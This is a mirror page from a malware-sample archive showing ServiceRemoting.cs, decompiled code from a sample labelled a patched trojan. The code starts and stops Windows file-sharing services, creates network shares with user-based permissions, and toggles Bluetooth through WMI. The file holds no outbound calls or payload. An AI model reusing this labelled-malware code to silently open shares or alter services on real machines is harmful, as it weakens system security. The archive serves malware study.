ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-20 18:36:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
9432413cf6
MalwareSourceCode/MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-b68a9fa2c98a839bfc61691e6eb35adb96800cd5aaf0117d115403b016aa72c1/ServiceRemoting.cs
vxunderground f2ac1ece55 auto-decompiled msil via petikvx 
add
2022-08-18 06:28:56 -05:00

330 lines
17 KiB
C#
Raw Blame History

// Decompiled with JetBrains decompiler
// Type: ServiceRemoting
// Assembly: MobilityService, Version=1.0.2519.23335, Culture=neutral, PublicKeyToken=null
// MVID: DCE01E20-F0BF-43A3-ABD9-0E64E99A2DB6
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Patched.mf-b68a9fa2c98a839bfc61691e6eb35adb96800cd5aaf0117d115403b016aa72c1.exe
using \u003CCppImplementationDetails\u003E;
using MobilityInterface;
using System;
using System.Runtime.InteropServices;
public class ServiceRemoting : MarshalByRefObject, MobilityRemotingInterface
{
public unsafe WMI* m_WMI;
public unsafe ServiceRemoting()
{
if ((IntPtr) this.m_WMI != IntPtr.Zero)
return;
WMI* wmiPtr1 = (WMI*) \u003CModule\u003E.@new(28U);
WMI* wmiPtr2;
// ISSUE: fault handler
try
{
wmiPtr2 = (IntPtr) wmiPtr1 == IntPtr.Zero ? (WMI*) 0 : \u003CModule\u003E.WMI\u002E\u007Bctor\u007D(wmiPtr1);
}
__fault
{
\u003CModule\u003E.delete((void*) wmiPtr1);
}
this.m_WMI = wmiPtr2;
}
[return: MarshalAs(UnmanagedType.U1)]
public virtual unsafe bool GetFileSharingServiceStatus()
{
SC_HANDLE__* scHandlePtr1 = \u003CModule\u003E.OpenSCManagerA((sbyte*) 0, (sbyte*) 0, 2147483648U);
if ((IntPtr) scHandlePtr1 == IntPtr.Zero)
return false;
SC_HANDLE__* scHandlePtr2 = \u003CModule\u003E.OpenServiceA(scHandlePtr1, (sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_0N\u0040GEBNOFCA\u0040lanmanserver\u003F\u0024AA\u0040, 2147483648U);
_SERVICE_STATUS serviceStatus;
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
return (IntPtr) scHandlePtr2 != IntPtr.Zero && \u003CModule\u003E.QueryServiceStatus(scHandlePtr2, &serviceStatus) != 0 && ^(int&) ((IntPtr) &serviceStatus + 4) == 4;
}
public virtual unsafe void StartFileSharingService()
{
SC_HANDLE__* scHandlePtr1 = \u003CModule\u003E.OpenSCManagerA((sbyte*) 0, (sbyte*) 0, 983103U);
if ((IntPtr) scHandlePtr1 == IntPtr.Zero)
return;
SC_HANDLE__* scHandlePtr2 = \u003CModule\u003E.OpenServiceA(scHandlePtr1, (sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_07BCFNLIJJ\u0040Browser\u003F\u0024AA\u0040, 983551U);
if ((IntPtr) scHandlePtr2 == IntPtr.Zero)
return;
\u003CModule\u003E.StartServiceA(scHandlePtr2, 0U, (sbyte**) 0);
}
public virtual unsafe void StopFileSharingService()
{
SC_HANDLE__* scHandlePtr1 = \u003CModule\u003E.OpenSCManagerA((sbyte*) 0, (sbyte*) 0, 983103U);
if ((IntPtr) scHandlePtr1 == IntPtr.Zero)
return;
SC_HANDLE__* scHandlePtr2 = \u003CModule\u003E.OpenServiceA(scHandlePtr1, (sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_07BCFNLIJJ\u0040Browser\u003F\u0024AA\u0040, 983551U);
_SERVICE_STATUS serviceStatus;
if ((IntPtr) scHandlePtr2 != IntPtr.Zero)
{
\u003CModule\u003E.ControlService(scHandlePtr2, 1U, &serviceStatus);
if (\u003CModule\u003E.QueryServiceStatus(scHandlePtr2, &serviceStatus) != 0)
{
int num = 30;
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
if (^(int&) ((IntPtr) &serviceStatus + 4) != 1)
{
while (num > 0)
{
\u003CModule\u003E.Sleep(500U);
--num;
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
if (\u003CModule\u003E.QueryServiceStatus(scHandlePtr2, &serviceStatus) == 0 || ^(int&) ((IntPtr) &serviceStatus + 4) == 1)
break;
}
}
}
\u003CModule\u003E.CloseServiceHandle(scHandlePtr2);
}
SC_HANDLE__* scHandlePtr3 = \u003CModule\u003E.OpenServiceA(scHandlePtr1, (sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_0N\u0040GEBNOFCA\u0040lanmanserver\u003F\u0024AA\u0040, 983551U);
if ((IntPtr) scHandlePtr3 == IntPtr.Zero)
return;
\u003CModule\u003E.ControlService(scHandlePtr3, 1U, &serviceStatus);
if (\u003CModule\u003E.QueryServiceStatus(scHandlePtr3, &serviceStatus) != 0)
{
int num = 30;
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
if (^(int&) ((IntPtr) &serviceStatus + 4) != 1)
{
while (num > 0)
{
\u003CModule\u003E.Sleep(500U);
--num;
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
if (\u003CModule\u003E.QueryServiceStatus(scHandlePtr3, &serviceStatus) == 0 || ^(int&) ((IntPtr) &serviceStatus + 4) == 1)
break;
}
}
}
\u003CModule\u003E.CloseServiceHandle(scHandlePtr3);
}
public unsafe uint GetLogOnUserSecurityDescriptor(void** pSecurityDescriptor, _ACL** pACL)
{
// ISSUE: untyped stack allocation
int num1 = (int) __untypedstackalloc(\u003CModule\u003E.__CxxQueryExceptionSize());
uint num2 = 0;
uint securityDescriptor = 1064;
*(int*) pSecurityDescriptor = 0;
*(int*) pACL = 0;
uint consoleSessionId = \u003CModule\u003E.WTSGetActiveConsoleSessionId();
_WTS_PROCESS_INFOA* wtsProcessInfoaPtr1;
if (consoleSessionId != uint.MaxValue && \u003CModule\u003E.WTSEnumerateProcessesA((void*) 0, 0U, 1U, &wtsProcessInfoaPtr1, &num2) != 0)
{
_WTS_PROCESS_INFOA* wtsProcessInfoaPtr2 = wtsProcessInfoaPtr1;
for (uint index = 0; index < num2; ++index)
{
if ((IntPtr) \u003CModule\u003E._mbsstr((byte*) *(int*) ((IntPtr) wtsProcessInfoaPtr1 + 8), (byte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_0N\u0040DGECLGHJ\u0040explorer\u003F4exe\u003F\u0024AA\u0040) != IntPtr.Zero)
{
if (*(int*) wtsProcessInfoaPtr1 == (int) consoleSessionId)
{
try
{
\u0024ArrayType\u0024\u0024\u0024BY00U_EXPLICIT_ACCESS_A\u0040\u0040 uExplicitAccessA;
// ISSUE: initblk instruction
__memset(ref uExplicitAccessA, 0, 32);
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(int&) ref uExplicitAccessA = 268435456;
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(int&) ((IntPtr) &uExplicitAccessA + 4) = 2;
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(int&) ((IntPtr) &uExplicitAccessA + 8) = 0;
\u003CModule\u003E.BuildTrusteeWithSidA((_TRUSTEE_A*) ((IntPtr) &uExplicitAccessA + 12), (void*) *(int*) ((IntPtr) wtsProcessInfoaPtr1 + 12));
if (0U != \u003CModule\u003E.SetEntriesInAclA(1U, (_EXPLICIT_ACCESS_A*) &uExplicitAccessA, (_ACL*) 0, pACL))
throw new Exception();
void* voidPtr = \u003CModule\u003E.LocalAlloc(64U, 20U);
*(int*) pSecurityDescriptor = (int) voidPtr;
if (IntPtr.Zero == (IntPtr) voidPtr)
throw new Exception();
if (\u003CModule\u003E.InitializeSecurityDescriptor(voidPtr, 1U) == 0)
throw new Exception();
\u003CModule\u003E.SetSecurityDescriptorOwner((void*) *(int*) pSecurityDescriptor, (void*) *(int*) ((IntPtr) wtsProcessInfoaPtr1 + 12), 1);
if (\u003CModule\u003E.SetSecurityDescriptorDacl((void*) *(int*) pSecurityDescriptor, 1, (_ACL*) *(int*) pACL, 0) == 0)
throw new Exception();
securityDescriptor = 0U;
break;
}
catch (Exception ex1) when (
{
// ISSUE: unable to correctly present filter
uint exceptionCode = (uint) Marshal.GetExceptionCode();
if (\u003CModule\u003E.__CxxExceptionFilter((void*) Marshal.GetExceptionPointers(), (void*) 0, 0, (void*) 0) != 0)
{
SuccessfulFiltering;
}
else
throw;
}
)
{
uint num3 = 0;
\u003CModule\u003E.__CxxRegisterExceptionObject((void*) Marshal.GetExceptionPointers(), (void*) num1);
try
{
try
{
}
catch (Exception ex2) when (
{
// ISSUE: unable to correctly present filter
num3 = (uint) \u003CModule\u003E.__CxxDetectRethrow((void*) Marshal.GetExceptionPointers());
if (num3 != 0U)
{
SuccessfulFiltering;
}
else
throw;
}
)
{
}
break;
if (num3 != 0U)
throw;
else
break;
}
finally
{
\u003CModule\u003E.__CxxUnregisterExceptionObject((void*) num1, (int) num3);
}
}
}
}
wtsProcessInfoaPtr1 += 16;
}
\u003CModule\u003E.WTSFreeMemory((void*) wtsProcessInfoaPtr2);
}
return securityDescriptor;
}
[return: MarshalAs(UnmanagedType.U1)]
public virtual unsafe bool AddSharedFolder(string sharedName, string sharedFolder)
{
char* hglobalUni1 = (char*) (void*) Marshal.StringToHGlobalUni(sharedName);
char* hglobalUni2 = (char*) (void*) Marshal.StringToHGlobalUni(sharedFolder);
uint num = 0;
void* voidPtr = (void*) 0;
_ACL* aclPtr = (_ACL*) 0;
int securityDescriptor = (int) this.GetLogOnUserSecurityDescriptor(&voidPtr, &aclPtr);
_SHARE_INFO_502 shareInfo502;
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(int&) ref shareInfo502 = (int) hglobalUni1;
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(int&) ((IntPtr) &shareInfo502 + 4) = 0;
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(int&) ((IntPtr) &shareInfo502 + 8) = (int) &\u003CModule\u003E.\u003F\u003F_C\u0040_11LOCGONAA\u0040\u003F\u0024AA\u003F\u0024AA\u0040;
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(int&) ((IntPtr) &shareInfo502 + 12) = 0;
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(int&) ((IntPtr) &shareInfo502 + 16) = 4;
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(int&) ((IntPtr) &shareInfo502 + 20) = 0;
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(int&) ((IntPtr) &shareInfo502 + 24) = (int) hglobalUni2;
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(int&) ((IntPtr) &shareInfo502 + 28) = 0;
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(int&) ((IntPtr) &shareInfo502 + 36) = (int) voidPtr;
bool flag = \u003CModule\u003E.NetShareAdd((char*) 0, 502U, (byte*) &shareInfo502, &num) == 0U;
\u003CModule\u003E.SHChangeNotify(512, 1U, (void*) hglobalUni2, (void*) 0);
if ((IntPtr) aclPtr != IntPtr.Zero)
\u003CModule\u003E.LocalFree((void*) aclPtr);
if ((IntPtr) voidPtr != IntPtr.Zero)
\u003CModule\u003E.LocalFree(voidPtr);
Marshal.FreeHGlobal(new IntPtr((void*) hglobalUni1));
Marshal.FreeHGlobal(new IntPtr((void*) hglobalUni2));
return flag;
}
[return: MarshalAs(UnmanagedType.U1)]
public virtual unsafe bool RemoveSharedFolder(string sharedName, string sharedFolder)
{
char* hglobalUni1 = (char*) (void*) Marshal.StringToHGlobalUni(sharedName);
char* hglobalUni2 = (char*) (void*) Marshal.StringToHGlobalUni(sharedFolder);
bool flag = true;
if (\u003CModule\u003E.NetShareDel((char*) 0, hglobalUni1, 0U) != 0U)
flag = false;
\u003CModule\u003E.SHChangeNotify(1024, 1U, (void*) hglobalUni2, (void*) 0);
Marshal.FreeHGlobal(new IntPtr((void*) hglobalUni1));
Marshal.FreeHGlobal(new IntPtr((void*) hglobalUni2));
return flag;
}
public virtual unsafe int GetBluetooth()
{
tagVARIANT tagVariant;
\u003CModule\u003E.VariantInit(&tagVariant);
if (\u003CModule\u003E.WMI\u002EWMIMethodExecGet(this.m_WMI, (char*) &\u003CModule\u003E.\u003F\u003F_C\u0040_1GE\u0040OBACBGCF\u0040\u003F\u0024AAE\u003F\u0024AAC\u003F\u0024AAD\u003F\u0024AAe\u003F\u0024AAv\u003F\u0024AAi\u003F\u0024AAc\u003F\u0024AAe\u003F\u0024AAC\u003F\u0024AAo\u003F\u0024AAn\u003F\u0024AAt\u003F\u0024AAr\u003F\u0024AAo\u003F\u0024AAl\u003F\u0024AA\u003F4\u003F\u0024AAI\u003F\u0024AAn\u003F\u0024AAs\u003F\u0024AAt\u003F\u0024AAa\u003F\u0024AAn\u003F\u0024AAc\u003F\u0024AAe\u003F\u0024AAN\u003F\u0024AAa\u003F\u0024AAm\u003F\u0024AAe\u003F\u0024AA\u003F\u0024DN\u003F\u0024AA\u003F\u0024CC\u003F\u0024AAA\u003F\u0024AAC\u0040, (char*) &\u003CModule\u003E.\u003F\u003F_C\u0040_1BK\u0040CKLOFOL\u0040\u003F\u0024AAG\u003F\u0024AAe\u003F\u0024AAt\u003F\u0024AAB\u003F\u0024AAl\u003F\u0024AAu\u003F\u0024AAe\u003F\u0024AAt\u003F\u0024AAo\u003F\u0024AAo\u003F\u0024AAt\u003F\u0024AAh\u003F\u0024AA\u003F\u0024AA\u0040, (char*) &\u003CModule\u003E.\u003F\u003F_C\u0040_1BA\u0040POAHONEM\u0040\u003F\u0024AAu\u003F\u0024AAS\u003F\u0024AAt\u003F\u0024AAa\u003F\u0024AAt\u003F\u0024AAu\u003F\u0024AAs\u003F\u0024AA\u003F\u0024AA\u0040, &tagVariant) == 0)
{
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
int bluetooth = ^(int&) ((IntPtr) &tagVariant + 8);
\u003CModule\u003E.VariantClear(&tagVariant);
return bluetooth;
}
\u003CModule\u003E.VariantClear(&tagVariant);
return -1;
}
public virtual unsafe void SetBluetooth(int Brightness)
{
tagVARIANT tagVariant1;
\u003CModule\u003E.VariantInit(&tagVariant1);
tagVARIANT tagVariant2;
\u003CModule\u003E.VariantInit(&tagVariant2);
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(short&) ref tagVariant2 = (short) 3;
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(int&) ((IntPtr) &tagVariant2 + 8) = Brightness;
\u003CModule\u003E.WMI\u002EWMIMethodExecSet(this.m_WMI, (char*) &\u003CModule\u003E.\u003F\u003F_C\u0040_1CA\u0040FPONMHDE\u0040\u003F\u0024AAE\u003F\u0024AAC\u003F\u0024AAD\u003F\u0024AAe\u003F\u0024AAv\u003F\u0024AAi\u003F\u0024AAc\u003F\u0024AAe\u003F\u0024AAC\u003F\u0024AAo\u003F\u0024AAn\u003F\u0024AAt\u003F\u0024AAr\u003F\u0024AAo\u003F\u0024AAl\u003F\u0024AA\u003F\u0024AA\u0040, (char*) &\u003CModule\u003E.\u003F\u003F_C\u0040_1GE\u0040OBACBGCF\u0040\u003F\u0024AAE\u003F\u0024AAC\u003F\u0024AAD\u003F\u0024AAe\u003F\u0024AAv\u003F\u0024AAi\u003F\u0024AAc\u003F\u0024AAe\u003F\u0024AAC\u003F\u0024AAo\u003F\u0024AAn\u003F\u0024AAt\u003F\u0024AAr\u003F\u0024AAo\u003F\u0024AAl\u003F\u0024AA\u003F4\u003F\u0024AAI\u003F\u0024AAn\u003F\u0024AAs\u003F\u0024AAt\u003F\u0024AAa\u003F\u0024AAn\u003F\u0024AAc\u003F\u0024AAe\u003F\u0024AAN\u003F\u0024AAa\u003F\u0024AAm\u003F\u0024AAe\u003F\u0024AA\u003F\u0024DN\u003F\u0024AA\u003F\u0024CC\u003F\u0024AAA\u003F\u0024AAC\u0040, (char*) &\u003CModule\u003E.\u003F\u003F_C\u0040_1BK\u0040ICGNCIEN\u0040\u003F\u0024AAS\u003F\u0024AAe\u003F\u0024AAt\u003F\u0024AAB\u003F\u0024AAl\u003F\u0024AAu\u003F\u0024AAe\u003F\u0024AAt\u003F\u0024AAo\u003F\u0024AAo\u003F\u0024AAt\u003F\u0024AAh\u003F\u0024AA\u003F\u0024AA\u0040, (char*) &\u003CModule\u003E.\u003F\u003F_C\u0040_1BA\u0040POAHONEM\u0040\u003F\u0024AAu\u003F\u0024AAS\u003F\u0024AAt\u003F\u0024AAa\u003F\u0024AAt\u003F\u0024AAu\u003F\u0024AAs\u003F\u0024AA\u003F\u0024AA\u0040, (char*) &\u003CModule\u003E.\u003F\u003F_C\u0040_1BG\u0040IMJCDLFP\u0040\u003F\u0024AAu\u003F\u0024AAE\u003F\u0024AAr\u003F\u0024AAr\u003F\u0024AAo\u003F\u0024AAr\u003F\u0024AAC\u003F\u0024AAo\u003F\u0024AAd\u003F\u0024AAe\u003F\u0024AA\u003F\u0024AA\u0040, &tagVariant2, &tagVariant1);
\u003CModule\u003E.VariantClear(&tagVariant2);
}
[return: MarshalAs(UnmanagedType.U1)]
public virtual unsafe bool GetBluetoothExist()
{
tagVARIANT tagVariant;
\u003CModule\u003E.VariantInit(&tagVariant);
if (\u003CModule\u003E.WMI\u002EWMIDataBlockRead(this.m_WMI, (char*) &\u003CModule\u003E.\u003F\u003F_C\u0040_1DI\u0040KLICGGKE\u0040\u003F\u0024AAS\u003F\u0024AAE\u003F\u0024AAL\u003F\u0024AAE\u003F\u0024AAC\u003F\u0024AAT\u003F\u0024AA\u003F5\u003F\u0024AA\u003F\u0024CK\u003F\u0024AA\u003F5\u003F\u0024AAF\u003F\u0024AAR\u003F\u0024AAO\u003F\u0024AAM\u003F\u0024AA\u003F5\u003F\u0024AAE\u003F\u0024AAC\u003F\u0024AAD\u003F\u0024AAe\u003F\u0024AAv\u003F\u0024AAi\u003F\u0024AAc\u003F\u0024AAe\u003F\u0024AAE\u003F\u0024AAx\u003F\u0024AAi\u003F\u0024AAs\u003F\u0024AAt\u003F\u0024AA\u003F\u0024AA\u0040, (char*) &\u003CModule\u003E.\u003F\u003F_C\u0040_1BO\u0040GDAMCCI\u0040\u003F\u0024AAu\u003F\u0024AAE\u003F\u0024AAC\u003F\u0024AAD\u003F\u0024AAe\u003F\u0024AAv\u003F\u0024AAi\u003F\u0024AAc\u003F\u0024AAe\u003F\u0024AAE\u003F\u0024AAx\u003F\u0024AAi\u003F\u0024AAs\u003F\u0024AAt\u003F\u0024AA\u003F\u0024AA\u0040, &tagVariant) == 0)
{
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
if ((^(int&) ((IntPtr) &tagVariant + 8) & 16) != 0)
{
\u003CModule\u003E.VariantClear(&tagVariant);
return true;
}
\u003CModule\u003E.VariantClear(&tagVariant);
return false;
}
\u003CModule\u003E.VariantClear(&tagVariant);
return false;
}
}
Reference in New Issue View Git Blame Copy Permalink